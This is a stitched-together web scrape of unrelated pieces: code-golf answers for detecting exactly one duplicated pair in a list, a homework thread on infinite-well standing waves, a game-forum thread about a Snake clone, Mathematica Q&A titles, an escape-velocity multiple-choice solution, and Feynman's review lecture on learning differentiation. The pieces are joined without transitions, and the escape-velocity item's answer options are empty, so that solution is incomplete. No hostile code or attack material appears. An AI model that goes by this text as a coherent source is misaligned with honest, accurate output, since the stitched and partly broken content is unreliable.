f is a function that takes in an int* pointing to the list and an int that is the length of the list, and returns 1 if there are exactly two equal entries and all other entries are distinct, and 0 otherwise. The function checks all pairs of numbers in the list, counting the number of equal pairs, and returns whether the number of pairs is 1.

• return 1==t; can be return!~-t; to save a byte. – Jonathan Frech Oct 12 '17 at 7:15
• j<i;++j)t+=x[i]==x[j] can be j<i;)t+=x[i]==x[j++] to save a byte. – Kevin Cruijssen Oct 12 '17 at 8:03
• 73 bytes – ceilingcat Nov 2 '19 at 9:11

# Bash, 36, 35 bytes

for k;{ H[$k]=;};((${#H[@]}+1==$#))

TIO exit status 0: true, 1: false. ((..)) can be changed to echo $((..)) to see a boolean value (1: true, 0: false).

# Clojure, 31 bytes

#(=(count(set %))(-(count %)1))

Try it online!
Does the same as LyricLy's answer

• Welcome to PPCG! – Laikoni Oct 12 '17 at 22:14
• Thanks! Hope this answer is ok, I felt like I was misusing TIO haha – Gabe Laughlin Oct 12 '17 at 22:17

# Java 8, 46 44 bytes

l->l.stream().distinct().count()==l.size()-1

-2 bytes thanks to @Nevay. (Old answer: l->new java.util.HashSet(l).size()==l.size()-1)

Explanation: Try it here.

l->              // Method with List parameter and boolean return-type
  l.stream()     // Stream over the List
  .distinct()    // ignoring all duplicated items
  .count()       // and get the total amount of non-duplicated items in the List
  ==             // And check if it's equal to
  l.size()-1     // the size of the input-list - 1
                 // End of method (implicit / single-line return-statement)

• 44 bytes: l->l.stream().distinct().count()==l.size()-1 – Nevay Oct 13 '17 at 20:16

# Japt, 7 bytes

ÊɶUâ Ê

Ê    // Return whether the number of
Uâ   // unique items in the input
¶    // is equal to
ÊÉ   // the input's length minus one.

Try it online!

# Brachylog, 7 bytes

dl.&l-₁

Try it online!

Truthy/falsy input is achieved through predicate success/failure: if this predicate is run as the entire program on a single input, it will print true. if it succeeds and false. if it fails. The header on TIO is there so you can run all of the cases at once.

dl    The length of the input with duplicates removed
.     is the output variable,
&     and
l-₁   so is the length of the input minus 1.

# Regex (ECMAScript), 69 bytes

The input is in the form of a comma-delimited list of nonnegative integers in decimal.

^(?=.*(\b\w+\b).*\b\1\b)(?!(.*\b\1\b){3}|.*\b(?!\1\b)(\w+\b).*\b\3\b)

Try it online!

^
(?=
  .*(\b\w+\b)    # \1 = an element that occurs at least twice
  .*\b\1\b       # locate the second occurrence of \1
)
(?!
  (.*\b\1\b){3}         # Assert that \1 does not occur 3 or more times
|
  .*\b(?!\1\b)(\w+\b)   # \3 = any element that's different from \1
  .*\b\3\b              # Assert that \3 does not occur again
)

This can be trivially modified to work on positive integers in unary instead of nonnegative integers in decimal, in -2 bytes (67) by changing \w+ to x+. Making it handle nonnegative integers in unary would be a tad more involved, due to \b not matching between two commas.

# Mathematica, 26 bytes

(l=Length)@Union@#+1==l@#&

Try it online!

# Convex, 7 bytes

_Å,)\,=

Try it online!

## Batch, 109 bytes

@set/ap=1,s=0
@for %%x in (%*)do @(for %%y in (%*)do @set/a"s+=!(%%x-%%y)")&set/ap*=s,s=0
@if %p%==4 echo 1

Port of @DJMcMayhem's answer.

# Perl 5, 25+1 (-p)=26 bytes

$H{$_}=1}{$\=$.-1==keys%H

TIO

# Batch, 131

set b=,%*,
goto j
:l
call set f=%%b:,%1,=,#,%%
if "%b%"=="%f%" exit 1
set b=%f%
goto:eof
:j
FOR %%A IN (%b%) DO call :l %%A

The %errorlevel% can be checked for the result. It works by tokenising the input with FOR %%A IN (%b%) DO call :l %%A. Every instance of that token together with its surrounding commas is then replaced in a copy of the input with ",#," via call set f=%%b:,%1,=,#,%%. The resulting string is then compared to the copy of the previous string. If there is no change in the string, it is because that number has already occurred.

c:\>batfile.bat 1,2,3

# Perl 6, 12 bytes

{.Set+1==$_}

Try it online!

Convert to Set, test if the number of elements is less by one.

# R, 40 bytes

sum(outer(x<-scan(),x,"=="))==2+sum(x|1)

Try it online!

Approach is different from the other R solution – and not as golfy...

• Nit's Japt answer can (I think) be ported but using unique is certainly close-ish to duplicated – Giuseppe May 24 '18 at 20:41

# 12-basic, 31 bytes

FUNC S(L)?LEN(L|L)==LEN(L)-1END

The | (union) operator returns an array containing elements that are in either of the input arrays. As a side effect, it removes duplicates.

# Pari/GP, 16 bytes

a->#a==#Set(a)+1

Try it online!
# R, 38 bytes

Not quite as golfed as the other R answer, but a different approach.

length(a<-scan())-length(unique(a))==1

Try it online!

## F#, 49 bytes

let s c=Seq.distinct c|>Seq.length=Seq.length c-1

Try it online!

Seq.distinct creates a sequence of all the unique elements in the collection. If the number of distinct elements is one less than the original collection, there are soulmates.

# Javascript, 96 bytes

count=0
for(i=0;i<a.length;i++)for(j=0;j<a.length;j++)(a[i]==a[j]&&i!=j)?count++:0
console.log(count==2)
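For readers who want the semantics rather than the golf, here is an ungolfed reference sketch of my own (not one of the posted answers), using the same "unique count is length minus one" observation several answers above rely on:

```python
def has_soulmate(xs):
    """True iff exactly two entries are equal and all other entries are distinct.

    A single duplicated pair removes exactly one element when deduplicating,
    so the condition is: number of unique values == length - 1.
    """
    return len(set(xs)) == len(xs) - 1

# The truthy/falsey examples from the challenge:
print(has_soulmate([1, 1]))                 # -> True
print(has_soulmate([1, 6, 3, 4, 4, 7, 9]))  # -> True
print(has_soulmate([1, 1, 1]))              # -> False
print(has_soulmate([2, 1, 2, 1, 2]))        # -> False
```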
https://www.physicsforums.com/threads/infinite-wells-standing-wave.396378/
# Infinite well's standing wave

1. Apr 18, 2010

### skym

Show that the infinite well's standing-wave function can be expressed as a sum of two traveling waves of the form Ae^i(kx-wt).

2. Relevant equations

3. The attempt at a solution

2. Apr 18, 2010

### nickjer

Please show a bit more work. At least write out the infinite well's standing wave equation.
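For anyone landing on this thread later, the identity the problem asks for follows directly from Euler's formula. A sketch, assuming the usual infinite-well mode $\psi(x,t) = A\sin(kx)\,e^{-i\omega t}$ (which the thread itself never spells out):

```latex
A\sin(kx)\,e^{-i\omega t}
  = A\,\frac{e^{ikx} - e^{-ikx}}{2i}\,e^{-i\omega t}
  = \frac{A}{2i}\,e^{i(kx - \omega t)} - \frac{A}{2i}\,e^{-i(kx + \omega t)}
```

i.e. a right-moving and a left-moving traveling wave, each of the requested form $Ae^{i(kx-\omega t)}$ (the second with $k \to -k$), with amplitudes $\pm A/2i$.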
https://love2d.org/forums/viewtopic.php?t=10339
My First Game, Snake

Show off your games, demos and other (playable) creations.

awhite92
Prole
Posts: 21
Joined: Thu Jul 26, 2012 4:25 am

My First Game, Snake

hi, so i found this amazing 2D game engine, and fell in love. saw a video on a beautiful snake game viewtopic.php?f=5&t=2841&hilit=snayke cant wait for it to come out, but it inspired me to make my own for my first project. its an unlimited style game, no maps, it only speeds up. so here it is, it took about a week for the first version. when you play it, press "" to show the debug info; if you would, please tell me your FPS. its a bit heavy, that's why its difficulty is so hard. screenshots are kinda blurry, sorry, they are hosted on my G+. the snake is drawn with

Code:

love.graphics.rectangle

but the glow is an image. the food block is an image as well, makes it a lot easier to rotate. and to make the glow so pretty, im using

Code:

love.graphics.setBlendMode("additive")

try it out! have fun! and let me know what you think! btw this is my first post..

1.1
• added level status (every 10 food you would "level up", now you know what level you are)
• tweaked how snake and food is drawn
• prevented food from spawning on outer wall
• turned off v-sync so people can tell me their FPS

Attachments
Snake.love
Snake 1.1 for love 0.8.0
Last edited by awhite92 on Tue Aug 14, 2012 8:38 pm, edited 4 times in total.

saved by a scholarship.. redesigned my "avatar"

hoangdung
Prole
Posts: 1
Joined: Sat Aug 04, 2012 8:43 am
Contact:

Re: My First Game, Snake

My girlfriend likes the pink color, she really likes this. Thanks for this

awhite92
Prole
Posts: 21
Joined: Thu Jul 26, 2012 4:25 am

Re: My First Game, Snake

im glad someone liked it lol. im not getting a lot of feedback. is that normal for this forum? lol

Jack
Prole
Posts: 10
Joined: Sat Jan 07, 2012 5:01 am

Re: My First Game, Snake

I really like the font & tile style.
The gameplay is pretty standard for Snake, but great job on the graphics. I get 60 fps, so I'm assuming you are using some kind of FPS lock or v-sync. Great job.

Tesselode
Party member
Posts: 552
Joined: Fri Jul 23, 2010 7:55 pm

Re: My First Game, Snake

The game has had some unofficial releases, and you just did a pretty good recreation of it. Nice job! Can you make the snake's movement a little smoother?

awhite92
Prole
Posts: 21
Joined: Thu Jul 26, 2012 4:25 am

Re: My First Game, Snake

Jack wrote: I get 60 fps, so I'm assuming you are using some kind of FPS lock or v-sync.

i think it has to do with the graphic drivers/card. mine stays around 400 fps for the first 5 or so levels, then it slowly drops. I've tested it on a handful of machines and some of them have been locked at 60fps. although i do have v-sync on, so that might be why. but like i said this is my first game, and i like to go all out; it took about a week of programming. i didn't know anything about Lua, cuz i normally program in c#.

Jack wrote: I really like the font & tile style .... great job on the graphics...

Tesselode wrote: The game has had some unofficial releases, and you just did a pretty good recreation of it. Nice job!

thanks guys, im really glad y'all are liking it. and btw, im not trying to "recreate" it per se, i really used it as inspiration. i know it looks very similar, so im not taking credit for the design or anything lol. we can call it more of a clone i guess, but its not going to be to the same extent (levels, multi-player, networking; i think, etc), just wanting it to be an unlimited style play.

Tesselode wrote: Can you make the snake's movement a little smoother?

hm, i did notice in their game that it smoothly moved from block to block, but i don't know where to start with that, but i will see.

awhite92
Prole
Posts: 21
Joined: Thu Jul 26, 2012 4:25 am

GAME UPDATED

GAME UPDATED see first post for details.
Lafolie
Inner party member
Posts: 804
Joined: Tue Apr 05, 2011 2:59 pm
Location: SR388
Contact:

Re: My First Game, Snake

I'm getting > 360fps on my lesser gpu. This is pretty slick for a first project, keep it up.

Do you recognise when the world won't stop for you? Or when the days don't care what you've got to do? When the weight's too tough to lift up, what do you? Don't let them choose for you, that's on you.

awhite92
Prole
Posts: 21
Joined: Thu Jul 26, 2012 4:25 am

Re: My First Game, Snake

Lafolie wrote: I'm getting > 360fps on my lesser gpu. This is pretty slick for a first project, keep it up.

that's good, i was wondering how it would be on other PCs. and thanks, i will and i am!
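Earlier in the thread Tesselode asked about making the snake's movement smoother, and the author wasn't sure where to start. A common framework-agnostic approach (my own sketch, not from the thread) is to keep the game logic on the grid but interpolate the *drawn* position between the previous and next cell:

```python
def lerp(a, b, t):
    """Linear interpolation between a and b for t in [0, 1]."""
    return a + (b - a) * t

def draw_position(prev_cell, next_cell, time_since_step, step_interval, cell_size):
    """Smooth on-screen position for a snake segment moving between grid cells.

    The game logic still moves in whole cells; only the drawn position is
    interpolated by how far we are into the current movement step.
    """
    t = min(time_since_step / step_interval, 1.0)  # clamp so we never overshoot
    x = lerp(prev_cell[0], next_cell[0], t) * cell_size
    y = lerp(prev_cell[1], next_cell[1], t) * cell_size
    return x, y

# halfway through a step from cell (2, 3) to cell (3, 3), with 16 px cells:
print(draw_position((2, 3), (3, 3), 0.05, 0.10, 16))  # -> (40.0, 48.0)
```

In LÖVE this would run in love.draw, fed by the timer that already drives the grid steps.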
https://learn.careers360.com/engineering/question-solve-this-problem-the-kinetic-energy-needed-to-project-a-body-of-mass-m-from-the-earth-surface-radius-r-to-infinity-is/
#### The kinetic energy needed to project a body of mass m from the earth surface (radius R) to infinity is

Option 1)

Option 2)

Option 3)

Option 4)

As we learnt in

Escape velocity (in terms of radius of planet) -

wherein

• depends on the reference body
• the greater the value of $g$ or $R$, the greater the escape velocity

For earth: $v_{e}=\sqrt{2gR}$

Kinetic Energy $= \frac{1}{2}mv_{e}^{2} = \frac{1}{2}m(2gR) = mgR$

Option 1) This option is incorrect.
Option 2) This option is incorrect.
Option 3) This option is correct.
Option 4) This option is incorrect.
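A quick numerical sanity check (my own, not part of the original solution) that the binding-energy form $GMm/R$ agrees with the $mgR$ form when $g = GM/R^{2}$, using standard approximate Earth values:

```python
# Standard constants (approximate): gravitational constant, Earth mass/radius.
G = 6.674e-11      # m^3 kg^-1 s^-2
M = 5.972e24       # kg
R = 6.371e6        # m
m = 1.0            # kg test body

g = G * M / R**2                 # surface gravity implied by G, M, R (~9.8 m/s^2)
ke_binding = G * M * m / R       # energy needed to reach infinity from the surface
ke_mgr = m * g * R               # the mgR form from the solution above

# The two expressions are algebraically identical, so they match
# up to floating-point rounding.
print(abs(ke_binding - ke_mgr) / ke_binding < 1e-12)  # -> True
```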
http://mathematica.stackexchange.com/questions?page=67&sort=faq&pagesize=50
# All Questions 217 views ### Importation multiple dcm images [duplicate] I'm extremely new to Mathematica. I want to import 201 .dcm (DICOM) files into Mathematica 9. Is there a way to do this which doesn't require my doing it an image at a time? My ultimate need to is to ... 235 views ### Attempting to use NDSolve to plot harmonic oscillator solutions NDSolve[{ (-y''[r]/1880) + (470 (0.04077)^2 r^2 - 48 + 1/(1880 r^2)) y[r] == 0, y[0] = 0, y'[0] = 0}, y, {r, -4, 4}] I use this but get errors and am ... 296 views ### Extracting information from list I have a huge list that looks like this: ... 531 views ### EdgeRenderingFunction question Bug introduced in 9.0 and fixed in 10.0.0 (Edit 1 : I added this paragraph after the original post, for context) Some context for this question can be found in another post (http://mathematica.... 210 views ### How to place more than one ChartLabel in a BarChart I have the following data: ... 109 views ### Entering an differential equation in a Manipulate box Does anyone have an example of a Manipulate demonstration where the user can type into a box the differential equation, time interval, initial condition, and the result is plotted? This possible in ... 1k views ### Adding an image background to a graph that uses vertexposition Hello Mathematica stackexchange community! I need your help on a research project. I'm looking to create a graph g with vertices in specifies places and then use an image I have as the background of ... 2k views ### How to find intersection points of lines? Considering I have three functions f1 = -x + 1; f2 = x - 1; f3 = x + 3; How can I find the intersection points of this functions? Thanks. This didn't work <... 858 views ### Using Array Elements as Function Arguments Suppose I have an array p = {a,b,c,d} and a function f that takes a variable number of arguments. I want to evaluate ... 
4k views ### Stategies to avoid NIntegrate::slwcon error I am trying to numerically evaluate an integral whose integrand depends on two parameters, say $(a,b)$ and when $b\gg 1$ I suspect (although it's not guaranteed) that the integrand is very small. Thus ... 658 views ### Changing FrontEnd automatic scrolling in version 8 In Mathematica versions < 8, the FrontEnd has a very intelligent behavior: On evaluation, it by default automatically scrolls down the Notebook window to the last printed Output cell but also ... 299 views ### Incorrect Timing of Total For demonstrating how fast C-compiled functions can be, in one of my courses I use the following function for finding the sum of a list of reals: ... 423 views ### Unexpected result {“.a”, “co”, “.m”} from Sort[{“.m”, “.a”, “co”}] I came across the following situation: Evaluating Sort[{".m", ".a", "co"}] Results in {".a", "co", ".m"} I wondering: ... 611 views ### How do I introduce a new variable in a trigonometric equation? I have the trigonometric equation \begin{equation*} \sin^8 x + 2\cos^8 x -\dfrac{1}{2}\cos^2 2x + 4\sin^2 x= 0. \end{equation*} By putting $t = \cos 2x$, I have \begin{equation*} \dfrac{3}{16} t^4+ \... 1k views ### Insphere for Irregular Tetrahedron I am looking for existing Mathematica code to compute the unique sphere inscribed inside an irregular tetrahedron. I can write it myself, but I would love to find that someone already performed this ... 6k views ### Plotting vectors originating from the origin in 3D I have an array of data with 3D elements. Ex: x = {{1,2,3}, {3,4,5}, {5,6,7}}. I want to show this data in 3 dimensions, such that each point in the space is shown ... 302 views ### RegionPlot returning a number Bug introduced in 10.0 and persisting through 10.4 or later I had updated my mathematica to version 10 few days ago. And I had been shocked by the following fact: ... 
271 views ### A bug in Commonest in version 10 Bug introduced in 10.0.0 and fixed in 10.0.2 m_goldberg demonstrated that in Mathematica 10 Commonest does not behave as the documentation indicates that it will.... 324 views ### Why does Mathematica simplify $x/x\to1$? If I enter x/x, I get 1. Such behavior leads to this: Simplify[D[Sqrt[x^2], x, x]] 0 ... 462 views ### Strange behaviour of Reduce for Mod[x,1] For every integer $x$ the equation Mod[x, 1] == 0 holds. While Simplify[Mod[x, 1] == 0, Element[x,Integers]] gives ... 951 views ### How to remove accents from text? I would like to know how I can remove accents from a string. For example, how can I transform "string test áéíóú" into ... 449 views Bug still present in version 10 under Windows. In a recent posting, Belisarius solved a problem related to the display of arrows on the x and y axes by setting ... 463 views ### Why do NumberForm and Round apparently use different tie-breaking methods? When rounding numbers (for example, rounding a real number to the nearest integer), the "round to nearest" rule is usually used. For example, 1.4 is rounded down to 1 and 1.6 is rounded up to 2. ... 650 views ### How would I return a random Mathematica command? I'm doing some metaprogramming. How would I make a Mathematica function that returns a random Mathematica command? Is there a list of command names that I could use ... 777 views ### How do I “start a reference system”? When I attempt to insert a citation or specify a database to use as a bibliography, I get a message that I need to "start" the "reference system" "manually": I have no idea what a references system ... 377 views ### FindInstance returns Indeterminate in version 9, but not in 8 Bug introduced in 9.0 and fixed in 10.0.0 Here is a trivial system of equations in three unknowns for which FindInstance obtains a solution: ... 577 views ### How to embed an image into a string? 
Note: The bug described in the post is in Mathematica 9, and has been fixed in 10.0. The documentation for String contains the following statements: Strings ... 826 views ### Does $x>0$ imply that $x\in\mathbb{R}$? Let’s assume I input Assuming[x > 0, expression] Is it assumed by Mathematica that $x$ is a real number? Or that the real part of $x$ is positive? Something ... 828 views ### Problems with “Test Connectivity” and the Pacletserver I know there has been a similar questions to this already but the solution did not work for me so here again: I have internet connection and I can execute such commands like: ... 337 views ### ToNumberField won't recognize Root as an explicit algebraic number Bug fixed in 10.0.0 In Mathematica 9.0.1, it appears that ToNumberField will not always recognize a Root object as an ... 2k views ### How do I find the degree of a multivariable polynomial automatically? I have a very simple question which appears not to have already been answered on this forum. Is there built-in functionality that returns the degree of a multivariable polynomial? For example if the ... 543 views ### Evaluation indicator for a notebook I have a GUI with a number of TabView and other Manipulate controls. Sometimes clicking from one tab view to the other can take ... 344 views I have a ragged list ragged = {{a,b,c,d,e},{x,y,z}} that I would like to trim (on the right) to be rectangular. The desired result is ... 1k views ### Why is ListDensityPlot unable to plot datasets with extreme ranges Consider the following dataset: data = Flatten[ Table[{x 10^-9, y 10^-9, x^2 + y^2},{x, -100, 100, 10}, {y, -100,100, 10}] , 1]; If I try to ... 832 views ### Why can't I change the value of MaxRecursion in NIntegrate when integrating BesselJ? Bug introduced in 8.0.4 or earlier and persists through 10.4. I am trying to evaluate this integral numerically $$\int_0^{\infty } J_0(q R) \tanh(q) \, \mathrm{d}q$$ for large values of $R$. ... 
284 views ### Evaluate selection in new window or new notebook? Sometimes when you have long code you need to check some part of this code. the way I am using currently is to selected the part that I want and then copy it to new notebook and then evaluate it ... 138 views ### Strange result of Reduce and ForAll In the question Can Mathematica tell me if a polynomial has all real roots?, quite a few of interesting answers were given. I wanted to add another one, using quantors, and observed some strange ... 566 views ### How can I highlight a moving bar in an animation of a bar chart? I wrote the following code, but I don't know how to highlight the moving bar. ... 394 views ### Memory leak in FE? A very abridged example of what was originally a major leak ... 502 views ### Modelling the effect of a structure on a "tsunami" (hyperbolic wave equation) So, the hyperbolic wave equation can be quite easily solved in Mathematica like this: ... 265 views ### How to pass composite function list to SortBy? In order to sort alphanumeric-as-string data of the form {"T3", "T14", "T1", "E2"}, so that "T14" comes after ...
https://www.feynmanlectures.caltech.edu/TIPS_01.html
The recording of this lecture is missing from the Caltech Archives.

## 1 Prerequisites—Review Lecture A

(There was no summary for this lecture.)

### 1–1 Introduction to the review lectures

These three optional lectures are going to be dull: they go over the same material that we went over before, adding absolutely nothing. So I’m very surprised to see so many people here. Frankly, I had rather hoped there would be fewer of you, and that these lectures wouldn’t be necessary. The purpose of relaxing at this time is to give you time to think about things, to piddle around with the things that you heard about. That’s by all odds the most effective way of learning the physics: it’s not a good idea to come in and listen to some review; it’s better to make up the review for yourself.
So I’d advise you—if you’re not too far lost, completely befuddled and confused—that you forget about these lectures and piddle around by yourself, and try to find out what’s interesting without grinding down some particular track. You’ll learn infinitely better and easier and more completely by picking a problem for yourself that you find interesting to fiddle around with—some kind of a thing that you heard that you don’t understand, or you want to analyze further, or want to do some kind of a trick with—that’s the best way to learn something. The lectures that we have been giving so far are a new course, and have been designed to answer a problem we presumed existed: nobody knows how to teach physics, or to educate people—that’s a fact, and if you don’t like the way it’s being done, that’s perfectly natural. It’s impossible to teach satisfactorily: for hundreds of years, even more, people have been trying to figure out how to teach, and nobody has ever figured it out. So if this new course is not satisfactory, that’s not unique. At Caltech we are always changing the courses in the hope of improving them, and this year we changed the physics course again. One of the complaints in the past was that the students who are nearer the top find the whole subject of mechanics dull: they would find themselves grinding along, doing problems, studying reviews, and doing examinations, and there was no time to think about anything; there was no excitement in it; there was no description of its relation to modern physics, or anything like that. And so this set of lectures was designed to be better that way, to a certain extent, to help out those fellows, and to make the subject more interesting, if possible, by connecting it to the rest of the universe. 
On the other hand, this approach has the disadvantage that it confuses many people, because they don’t know what it is they’re supposed to learn—or, rather, that there’s so much stuff that they can’t learn all of it, and they haven’t got enough intelligence to figure out what is interesting to them, and to pay attention only to that. Therefore, I’m addressing myself to those people who have found the lectures very confusing, very annoying, and irritating, in the sense that they don’t know what to study, and they’re kind of lost. The other people, who don’t feel as lost, shouldn’t be here, so I now give you the opportunity to go out...1 I see nobody has the nerve. Or I guess I’m a great failure, then, if I got everybody lost! (Maybe you’re just here for entertainment.)

### 1–2 Caltech from the bottom

Now, I am therefore imagining that one of you has come into my office and said, “Feynman, I listened to all the lectures, and I took that midterm exam, and I’m trying to do the problems, and I can’t do anything, and I think I’m in the bottom of the class, and I don’t know what to do.” What would I say to you? The first thing I would point out is this: to come to Caltech is an advantage in certain ways, and in other ways a disadvantage. Some of the ways that it’s an advantage you probably once knew, but now forget, and they have to do with the fact that the school has an excellent reputation, and the reputation is well deserved. There are pretty good courses. (I don’t know about this particular physics course; of course I have my own opinion about it.) The people who have come out the other end of Caltech, when they go into industry, or go to do work in research, and so forth, always say that they got a very good education here, and when they compare themselves with people who have gone to other schools (although many other schools are also very good) they never find themselves behind and missing something; they always feel they went to the best school of them all.
So that’s an advantage. But there is also a certain disadvantage: because Caltech has such a good reputation, almost everybody who’s the first or second in his high school class applies here. There are lots of high schools, and all the very best men2 apply. Now, we have tried to figure out a system of selection, with all kinds of tests, so that we get the best of the best. And so you guys have been very carefully picked out from all these schools to come here. But we’re still working on it, because we’ve found a very serious problem: no matter how carefully we select the men, no matter how patiently we make the analysis, when they get here something happens: it always turns out that approximately half of them are below average! Of course you laugh at this because it’s self-evident to the rational mind, but not to the emotional mind—the emotional mind can’t laugh at this. When you’ve lived all the time as number one or number two (or even possibly number three) in high school science, and when you know that everybody who’s below average in the science courses where you came from is a complete idiot, and now you suddenly discover that you are below average—and half of you guys are—it’s a terrible blow, because you imagine that it means you’re as dumb as those guys used to be in high school, relatively. That’s the great disadvantage of Caltech: that this psychological blow is so difficult to take. Of course, I’m not a psychologist; I’m imagining all this. I don’t know how it would really be, of course! The question is what to do if you find you’re below average. There are two possibilities. In the first place, you could find that it’s so difficult and annoying that you have to get out—that’s an emotional problem. You can apply your rational mind to that and point out to yourself what I just pointed out to you: that half of the guys in this place are going to be below average, even though they’re all tops, so it doesn’t mean anything. 
You see, if you can stick out that nonsense, that funny feeling, for four years, then you’ll go out into the world again, and you’ll discover that the world is just like it used to be—that when, for example, you get a job somewhere, you’ll find you’re Number One Man again, and you’ll get the great pleasure of being the expert they all come running to in this particular plant whenever they can’t figure out how to convert inches to centimeters! It’s true: the men who go out into industry, or go to a small school that doesn’t have an excellent reputation in physics, even if they’ve been in the bottom third, the bottom fifth, the bottom tenth of the class—if they don’t try to drive themselves (and I’ll explain that in a minute), then they’ll find themselves very much in demand, that what they learned here is very useful, and they’re back where they were before: happy, Number One. On the other hand you can make a mistake: some people may drive themselves to a point where they insist they have to become Number One, and in spite of everything they want to go to graduate school and they want to become the best Ph.D. in the best school, even though they’re starting out at the bottom of the class here. Well, they are likely to be disappointed and to make themselves miserable for the rest of their lives being always at the bottom of a very first-rate group, because they picked that group. That’s a problem, and that’s up to you—it depends on your personality. (Remember, I’m talking to the guy who came into my office because he’s in the lowest tenth; I’m not talking to the other fellows who are happy because they happen to be in the upper tenth—that’s a minority anyway!) So, if you can take this psychological blow—if you can say to yourself, “I’m in the lower third of the class, but a third of the guys are in the lower third of the class, because it’s got to be that way! I was the top guy in high school, and I’m still a smart son-of-a-gun. 
We need scientists in the country, and I’m gonna be a scientist, and when I get out of this school I’ll be all right, damn it! And I’ll be a good scientist!”—then it’ll be true: you will be a good scientist. The only thing is whether you can take the funny feelings during these four years, in spite of the rational arguments. If you find you can’t take the funny feelings, I suppose the best thing to do is to try to go somewhere else. It’s not a point of failure; it’s simply an emotional thing. Even if you’re one of the last couple of guys in the class, it doesn’t mean you’re not any good. You just have to compare yourself to a reasonable group, instead of to this insane collection that we’ve got here at Caltech. Therefore, I am making this review purposely for the people who are lost, so that they have still a chance to stay here a little longer to find out whether or not they can take it, okay? I make now one more point: that this is not a preparation for an examination, or anything like that. I don’t know anything about the examinations—I mean, I have nothing to do with making them up, and I don’t know what’s going to be on them, so there’s no guarantee whatsoever that what’s on the examination is only going to deal with the stuff reviewed in these lectures, or any nonsense of that kind.

### 1–3 Mathematics for physics

So, this guy comes into my office and asks me to try to make everything straight that I taught him, and this is the best I can do. The problem is to try to explain the stuff that was being taught. So I start, now, with the review. I would tell this guy, “The first thing you must learn is the mathematics. And that involves, first, calculus. And in calculus, differentiation.” Now, mathematics is a beautiful subject, and has its ins and outs, too, but we’re trying to figure out what the minimum amount we have to learn for physics purposes is.
So the attitude that’s taken here is a “disrespectful” one towards the mathematics, for sheer efficiency only; I’m not trying to undo mathematics. What we have to do is to learn to differentiate like we know how much is 3 and 5, or how much is 5 times 7, because that kind of work is involved so often that it’s good not to be confounded by it. When you write something down, you should be able to immediately differentiate it without even thinking about it, and without making any mistakes. You’ll find you need to do this operation all the time—not only in physics, but in all the sciences. Therefore differentiation is like the arithmetic you had to learn before you could learn algebra. Incidentally, the same goes for algebra: there’s a lot of algebra. We are assuming that you can do algebra in your sleep, upside down, without making a mistake. We know it isn’t true, so you should also practice algebra: write yourself a lot of expressions, practice them, and don’t make any errors. Errors in algebra, differentiation, and integration are only nonsense; they’re things that just annoy the physics, and annoy your mind while you’re trying to analyze something. You should be able to do calculations as quickly as possible, and with a minimum of errors. That requires nothing but rote practice—that’s the only way to do it. It’s like making yourself a multiplication table, like you did in elementary school: they’d put a bunch of numbers on the board, and you’d go: “This times that, this times that,” and so on—Bing! Bing! Bing!

### 1–4 Differentiation

In the same way you must learn differentiation. Make a card, and on the card write a number of expressions of the following general type: for example, \begin{aligned} &1+6t\\[.5ex] &4t^2+2t^3\\[.5ex] &(1+2t)^3\\[.5ex] &\sqrt{1+5t}\\[.5ex] &(t+7t^2)^{1/3} \end{aligned} \label{Eq:TIPS:1:1} and so on. Write, say, a dozen of these expressions.
Then, every once in a while, just take the card out of your pocket, put your finger on an expression, and read out the derivative. In other words, you should be able to see right away: \begin{aligned} \ddt{}{t}(1+6t) &= 6 \small\textit{ Bing!}\\[1ex] \ddt{}{t}(4t^2+2t^3) &= 8t+6t^2 \small\textit{ Bing!}\\[1ex] \ddt{}{t}(1+2t)^3 &= 6(1+2t)^2 \small\textit{ Bing!} \end{aligned} \label{Eq:TIPS:1:2} See? So the first thing to do is to memorize how to do derivatives—cold. That’s a necessary practice. Now, for differentiating more complicated expressions, the derivative of a sum is easy: it’s simply the sum of the derivatives of each separate summand. It isn’t necessary at this stage in our physics course to know how to differentiate expressions any more complicated than those above, or sums of them, so that in the spirit of this review, I shouldn’t tell you any more. But there is a formula for differentiating complicated expressions, which is usually not given in calculus class in the form that I’m going to give it to you, and it turns out to be very useful. You won’t learn it later, because nobody will ever tell it to you, but it’s a good thing to know how to do. Suppose I want to differentiate the following: $$\label{Eq:TIPS:1:3} \frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}} + \frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}$$ Now, the question is how to do it with dispatch. Here’s how you do it with dispatch. (These are just rules; it’s the level to which I’ve reduced the mathematics, because we’re working with the guys who can barely hold on.) Watch! You write the expression down again, and after each summand you put a bracket: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:4} Next, you’re going to write something inside the brackets, such that when you’re all finished, you’ll have the derivative of the original expression. 
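These memorized “Bing!” derivatives are easy to check for yourself. The following short Python sketch (an editor’s illustration, not part of the lecture; the function names are my own) compares each one against a centered finite difference at a sample point:

```python
# Check the drill derivatives of Eq. (1.2) against a centered
# finite difference at a sample point t.
def numderiv(f, t, h=1e-6):
    # centered difference approximates df/dt with error O(h^2)
    return (f(t + h) - f(t - h)) / (2 * h)

# (expression, its memorized derivative) pairs from Eq. (1.2)
cases = [
    (lambda t: 1 + 6*t,         lambda t: 6),
    (lambda t: 4*t**2 + 2*t**3, lambda t: 8*t + 6*t**2),
    (lambda t: (1 + 2*t)**3,    lambda t: 6*(1 + 2*t)**2),
]

t = 0.7
for f, df in cases:
    assert abs(numderiv(f, t) - df(t)) < 1e-5
```

Any expression you put on your practice card can be checked the same way.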
